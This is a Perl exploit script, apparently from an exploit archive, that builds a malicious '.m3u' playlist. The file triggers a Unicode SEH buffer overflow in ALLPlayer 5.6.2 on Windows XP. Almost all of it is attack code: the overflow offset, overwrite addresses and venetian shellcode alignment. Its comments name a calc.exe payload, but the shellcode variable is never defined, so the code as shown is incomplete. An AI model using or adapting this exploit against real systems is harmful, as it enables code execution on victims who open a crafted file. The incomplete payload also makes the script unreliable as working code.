ALLPlayer 5.6.2 – ‘.m3u’ File Local Buffer Overflow (SEH Unicode)

  • 作者: Mike Czumak
    日期: 2013-11-12
  • 类别:
  • 来源:
  • #!/usr/bin/perl
    # Exploit Title: ALLPlayer 5.6.2 (.m3u) - SEH Buffer Overflow (Unicode)
    # Date: 10-22-2013
    # Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
    # Vulnerable Software: ALLPlayer 5.6.2 
    # Software Link:
    # Version: 5.6.2
    # Tested On: Windows XP SP3
    # Credit to metacom for finding bug and publishing original POC
    # - 
    # Shouts to corelanc0d3r and b33f for some great unicode exploit tutorials
    # Due to unicode conversion this is a venetian shellcode exploit
    # To exploit simply open the created m3u file
    # Exploit-DB Note:
    # This also affects version 5.7 of the application
    my $buffsize = 5000; # sets buffer size for consistent sized payload
    my $junk = "http://" . "\x41" x 303; # offset to seh
    my $nseh = "\x61\x62"; # overwrite next seh with popad (populates all registers) + nop
    my $seh = "\x11\x4d"; # overwrite seh with unicode friendly pop pop ret
    		# 0x004d0011 : pop ecx # pop ebp # ret| startnull,unicode,ascii {PAGE_EXECUTE_READ} [ALLPlayer.exe] 
    		# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.6.2.0 (C:\Program Files\ALLPlayer\ALLPlayer.exe)
    # unicode venetian alignment
    my $venalign = "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad 
    $venalign = $venalign . "\x71"; # venetian pad/align
    $venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (100 bytes)
    $venalign = $venalign . "\x6e"; # venetian pad/align
    $venalign = $venalign . "\x05\x14\x11"; # add eax,0x11011400
    $venalign = $venalign . "\x6e"; # venetian pad/align 
    $venalign = $venalign . "\x2d\x13\x11"; # add eax,0x11011300
    $venalign = $venalign . "\x6e"; # venetian pad/align
    $venalign = $venalign . "\x50"; # push eax
    $venalign = $venalign . "\x6d"; # venetian pad/align
    $venalign = $venalign . "\xc3"; # ret
    my $nops = "\x71" x 109; # some unicode friendly filler before the shellcode
    # Calc.exe payload
    # msfpayload windows/exec CMD=calc.exe R
    # alpha2 unicode/uppercase
    my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer
    my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk
    my $buffer = $sploit.$fill; # assemble the final buffer
    # write the exploit buffer to file
    my $file = "allplayer_unicodeseh.m3u";
    open(FILE, ">$file");
    print FILE $buffer;
    print "Exploit file [" . $file . "] created\n";
    print "Buffer size: " . length($buffer) . "\n";